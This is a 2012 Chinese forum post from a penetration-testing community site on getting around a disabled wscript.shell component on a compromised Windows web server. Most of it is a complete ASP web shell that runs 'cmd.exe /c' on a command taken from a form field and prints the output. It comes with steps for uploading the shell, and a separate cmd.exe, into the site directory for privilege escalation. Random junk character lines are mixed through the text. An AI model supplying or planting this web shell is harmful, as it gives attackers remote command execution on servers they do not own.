中国网络渗透测试联盟
标题:
wscript.shell删除解决办法
[打印本页]
作者:
admin
时间:
2012-9-15 14:36
标题:
wscript.shell删除解决办法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
0 B a/ P {1 }. [& |
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
% n! j) O5 X& x* e0 f2 @
要想让运行命令可以试试这种方法,成功率为五五之数。
' p) C- j) N1 C4 v2 z" P
把下面代码复制:
+ ^4 b/ B/ A$ b3 m' G$ K( ^3 m5 g
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
1 a. E( N) i/ n; V# R; u) I
<%if err then%>
1 `, E! K5 d0 {4 S5 c% t
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
& G; b- q# y) t, h
<%
+ U2 c9 K' W% b' V( ]" E8 Z
end if
; ], q R+ r" y2 A& A& x3 c
response.write("<textarea readonly cols=80 rows=20>")
2 K3 \2 s8 d* z( G2 d& r, ~
On Error Resume Next
& a- |; o0 K9 X4 ~4 i% r+ I( T
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
" q5 ^) F5 Y- z% W& t
response.write("</textarea>")
# d; R; p+ n; p. R% ]9 W$ i, K' L
response.write("<form method='post'>")
$ N1 L( T% I. q5 s# q# G- W
response.write("<input type=text name='c' size=60><br>")
7 ^8 M \) T0 u& Q
response.write("<input type=submit value='执行'></form>")
/ _! V2 b! Y6 V4 S$ |3 @+ U
%>
% W: V" k2 f0 d! H+ @
* [! C3 o8 z" S/ k3 ^# y
保存为一个asp文件,然后传到网站目录上去
# S7 c# N/ W% w( G
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
; j; u% @+ N& v
我用此成功运行过cacls命令。
4 o8 Z, N) L/ a+ X" N, J% z' T
% V: [3 }. e! k3 l, m
第二那就是运行时出错,可能限制某些代码执行
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2